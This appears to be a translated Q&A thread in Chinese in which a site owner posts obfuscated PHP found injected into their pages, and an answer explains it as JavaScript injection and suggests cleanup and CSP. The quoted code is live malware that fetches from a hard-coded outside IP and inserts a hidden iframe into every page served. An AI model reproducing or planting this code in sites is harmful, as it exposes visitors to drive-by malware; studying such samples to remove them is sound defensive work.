1

我在我的一些 .PHP 页面上找到了这些代码行。

<?php /*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='http://82.200.204.151/config.inc.php' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->(.*?)<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->/i', '', $asd); $sdf = file_get_contents('http://82.200.204.151/config.inc.php');return str_replace('</body>', str_replace('http://82.200.204.151/config.inc.php', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/ ?>

有人知道吗?

或者至少告诉我它在做什么......

4

1 回答 1

6

2015 年 9 月 11 日更新

这称为 JavaScript 注入 ( XSS 1 ),它发生在您的服务器被黑客入侵并传播感染时。

例如,这可能会在进入网站时提示下载窗口,导致被误导的用户在他们的机器上下载可能的恶意软件。

要摆脱它,您最好检查您拥有的所有文件,扫描您的整个 PC/也许进行全新安装。文件中通常有一些奇怪<script>的标签,其中包含一些非常奇怪的“毫无意义”的 JS——这很好地表明你的文件已经被注入了 JS。

如果你想永久摆脱它,你还需要找到泄漏(或者直到他们找到 XSS 网站的新方法)

这是您可以做的另一件事来保护自己免受 XSS 攻击:CSP

1 :: 跨站脚本

题外话:

由于我今天重新审视这个答案,在 2001 年 9 月 11 日之后的 14 年,我想向那天死去的人表示敬意 - RIP

于 2013-10-22T15:07:52.360 回答